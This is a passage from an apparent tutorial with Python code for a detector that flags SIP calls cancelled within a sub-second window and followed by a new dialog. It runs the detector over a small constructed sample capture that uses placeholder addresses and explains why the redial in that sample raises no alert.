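                        if ts - t <= CANCEL_WINDOW}
        self.early_cancel = {p: v for p, v in self.early_cancel.items()
                             if ts - v[0] <= FOLLOWUP_WINDOW}
        pair = (src, dst)
        if method == "INVITE":
            prev = self.early_cancel.get(pair)
            if prev and prev[1] != call_id:  # different Call-ID means a new dialog
                self.alerts.append({"src": src, "dst": dst, "time": ts,
                                    "cancelled_call_id": prev[1],
                                    "new_call_id": call_id})
                del self.early_cancel[pair]  # one alert per cancelled dialog
            # setdefault: a UDP retransmission must not reset the first-seen time
            self.invites.setdefault((src, dst, call_id), ts)
        elif method == "CANCEL":
            # Only INVITEs still inside CANCEL_WINDOW survive the expiry above.
            if self.invites.pop((src, dst, call_id), None) is not None:
                self.early_cancel[pair] = (ts, call_id)


def build(method, call_id, cseq=1):
    """Constructed sample request; user name and addresses are placeholders."""
    return (f"{method} sip:bob@192.0.2.10 SIP/2.0\r\n"
            f"Call-ID: {call_id}\r\n"
            f"CSeq: {cseq} {method}\r\n"
            "Content-Length: 0\r\n\r\n").encode()


PHONE = "192.0.2.10"
SAMPLE = [  # constructed capture: (seconds, source IP, destination IP, payload)
    (0.00, "198.51.100.7", PHONE, build("INVITE", "a1@198.51.100.7")),
    (0.05, PHONE, "198.51.100.7", b"SIP/2.0 100 Trying\r\n\r\n"),
    (0.10, "198.51.100.7", PHONE, build("CANCEL", "a1@198.51.100.7")),
    (0.20, PHONE, "198.51.100.7", b"SIP/2.0 487 Request Terminated\r\n\r\n"),
    (0.60, "198.51.100.7", PHONE, build("INVITE", "b2@198.51.100.7")),
    (0.90, "198.51.100.7", PHONE, build("INVITE", "b2@198.51.100.7")),  # retransmission
    (10.0, "198.51.100.9", PHONE, build("INVITE", "c3@198.51.100.9")),
    (18.0, "198.51.100.9", PHONE, build("CANCEL", "c3@198.51.100.9")),  # caller gave up
    (20.0, "198.51.100.9", PHONE, build("INVITE", "d4@198.51.100.9")),  # ordinary redial
]


def scan(events):
    """Run the detector over an ordered capture and return its alerts."""
    detector = Detector()
    for event in events:
        detector.feed(*event)
    return detector.alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The second caller in the sample cancels after eight seconds of ringing and redials, which stays below the alert threshold; only the sub-second cancel followed by a fresh dialog is reported.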